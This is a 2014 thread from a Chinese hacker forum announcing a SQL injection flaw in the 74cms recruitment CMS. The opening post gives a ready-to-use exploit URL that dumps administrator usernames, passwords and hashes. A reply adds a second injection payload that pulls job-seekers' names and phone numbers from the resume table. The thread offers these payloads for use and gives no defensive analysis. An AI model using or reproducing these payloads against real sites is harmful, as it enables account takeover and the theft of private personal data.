搜索
红客联盟 - 由08安全团队运营»社区首页 技术攻防 漏洞情报 74cms最新通杀注入漏洞
查看: 17904|回复: 4

74cms最新通杀注入漏洞

[复制链接]
90_
发表于 2014-5-29 13:25:17 | 显示全部楼层 |阅读模式
作者:暂时不知道

74官方测试:
2014052720202727.png

Exp:
[AppleScript] 纯文本查看 复制代码
http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23
回复

使用道具 举报

vivi
发表于 2014-5-29 14:06:53 | 显示全部楼层
多谢管理员分享。
回复 支持 0 反对 1

使用道具 举报

vivi
发表于 2014-5-29 16:06:46 | 显示全部楼层
可是密码是个问题!
这个是获取用户资料信息的exp:
plus/ajax_officebuilding.php?act=key&key=s%E9%8C%A6%27%20or%201=1%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,concat(0x3C623E5E5F5E203C2F623E,id,fullname,telephone,0x3C623E205E5F5E3C2F623E),9%20from%20qs_resume%23
回复 支持 反对

使用道具 举报

system_c
头像被屏蔽
发表于 2014-5-30 14:04:40 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

Puppet。
头像被屏蔽
发表于 2014-7-7 23:09:52 来自手机 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
回复 支持 反对

使用道具 举报

返回列表 发帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-6-16 19:33 , Processed in 0.105236 second(s), 30 queries , Gzip On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部